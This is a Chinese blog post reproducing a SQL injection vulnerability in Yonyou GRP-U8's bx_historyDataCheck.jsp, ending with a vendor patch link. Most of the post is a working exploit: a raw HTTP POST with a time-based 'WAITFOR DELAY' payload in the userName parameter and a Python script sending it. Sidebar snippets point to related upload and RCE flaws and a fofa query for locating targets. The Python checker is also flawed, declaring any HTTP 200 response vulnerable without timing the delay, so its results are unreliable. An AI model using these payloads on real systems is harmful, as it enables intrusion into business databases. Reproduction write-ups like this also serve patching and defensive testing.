用友GRP-U8 SQL注入漏洞复现

已于 2023-10-10 09:34:18 修改
阅读量1.5k 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 sql 数据库 python 网络安全
于 2023-09-26 16:27:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/133310341
版权

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、产品介绍

        成长型企业平台,以全新URP为平台,应对中型及成长型企业客户群的发展,用友U8为成长型企业提供了互联网应用模式,包括营销服务一体化、完整闭环O2O、供应链协同、设计制造一体化、精益生产、精细管控、人力资源、办公协同、移动应用、大数据分析、社交化协同和云服务,覆盖了企业的全业务。  

二、漏洞描述

        在用友GRP-U8的bx_historyDataCheck jsp 存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。本次漏洞主要是对查询语句后拼接的入参注入特定变量值,非法获取数据或对数据库服务器产生影响,存在一定的安全隐患。

三、影响版本

用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905

四、漏洞复现

1.访问漏洞环境

2.POC (POST)

        POST请求,延时注入


POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=5FF34252A52D49B94A560C18AB894656
Accept-Encoding: gzip

userName=';WAITFOR DELAY '0:0:6'--&class.module.classLoader.DefaultAssertionStatus=

执行poc

用python编写一个poc

import re
import requests

url = 'http://替换部分/u8qx/bx_historyDataCheck.jsp'

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '59',
    'Connection': 'close'
}

data = {
    "userName":"1';WAITFOR%20DELAY%20'0:0:6'--+&ysnd=&historyFlag="
}

response = requests.post(url, headers=headers, data=data)

print('Status Code:', response.status_code)
if response.status_code ==200:
    print('存在用友GRP-U8 SQL注入漏洞,请尽快修复漏洞!!!')
else:
    print('漏洞不存在。')

运行结果如图

 五、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://security.yonyou.com/#/patchInfo?foreignKey=77e7e13f32754da9a5be93a9bfbb3f4c
故事讲予风听
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
用友U8_bx_historyDataCheck.jsp SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
04-07 61
用友GRP-U8 bx_historyDataCheck.jsp存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。接收传参后并未进行任何过滤,从而导致sql注入没有人规定,一朵花,一定要成长为向日葵或者玫瑰。
用友GRP-U8行政事业内控管理软件产品简介(2016版)(V1.0).pdf
04-13
GRP-U8行政事业内控管理软件产品简介(2016版)(V1.0).pdf
用友GRP-U8 UploadFile 文件上传漏洞
Keepb1ue的博客
12-25 1877
用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/UploadFile接口存在文件上传漏洞,跟上篇文章类似,同样可以通过任意文件上传恶意后门文件,从而获取服务器权限。访问路径:/u8qx/tools/defaultviewer.jsp?通过防火墙等安全设备限制访问策略,设置内容检测机制和白名单访问。app=“用友-GRP-U8”如非必要,禁止公网访问该系统。
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3382
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
用友 GRP U8 UploadFile 命令执行漏洞
最新发布
做自己喜欢的事,并将其发挥到极致!
01-23 676
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞
用友 GRP-U8 存在sql注入漏洞复现
zkaqlaoniao的博客
10-30 1185
Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者info:name: 用友GRP-U8 License Check漏洞requests:path:kjnd=1';matchers:dsl:还没看够?可以关注~免费领取安全学习资料包!(私聊进群一起学习,共同进步)渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
漏洞复现】某友GRP-U8 SQL注入
失心少年
09-26 426
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。某友GRP-U8是某友软件推出的企业级管理软件套件,旨在助力企业实现全面数字化管理及业务优化,某友GRP-U8的bx_historyDataCheck.jsp接口对用户传入的参数未进行有效的过滤,直接拼接至SQL查询的语句中,导致SQL注入漏洞,攻击者可利用该漏洞获取数据库的敏感信息。
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1777
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友GRP-U8存在SQL注入漏洞复现
2301_80115097的博客
10-26 359
fofa:app=”用友-GRP-U8用友GRP-U8存在SQL注入漏洞文件名为bx_historyDataCheck.jsp。
用友GRPu8数据字典
01-03
用友软件GRPu8R10数据字典 ,以备不时之需。
用友政务GRP-U8,近期常见问题85例解决方法
03-26
1.查询科目明细账会出现很多重复记录,2.查询明细账未按照凭证号排序3.自定义凭证打印,不打印上级科目名称:13.打开凭证箱慢15.期初余额装入中导入Excel文件报错,17.以前是双凭证模式,怎么调整为单凭证模式等等85个问题解答。
GRP-U8管理软件行政事业版数据库
01-24
GRP-U8管理软件行政事业版数据库中表非常多,函数非常多,但是仔细分析以后有用的仅仅只有四张表。
用友GRP-U8-行政事业单位财务管理软件操作手册.pdf
03-30
用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-...
GRP-U8行政事业内控管理软件V11.21安装教程
05-28
鉴于很多新手朋友不会安装GRP-U8行政事业内控管理软件,故而出此视频教程!仅供参考!
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
11-04
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
用友GRP-U8 ReturnForWcp RCE漏洞复现
0xSec
11-16 1107
用友GRP-U8内控管理软件/servlet/PayReturnForWcp接口处存在xxe漏洞,攻击者可利用xxe漏洞组合内部axis组件的AdminService部署恶意类service,使用外部实体%name来加载"http://xxxx/services/AdminService?method=xx" 远程URL,调用javax.elELProcessor,部署成功后可写入恶意后门文件,可导致服务器失陷。
用友GRP-U8 内控管理软件/servlet/FileUpload 任意文件上传漏洞复现
0xSec
12-23 1031
用友GRP-U8内控管理软件存在任意文件(/servlet/FileUpload)上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
用友GRP-U8高校内控管理软件 漏洞
07-28
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值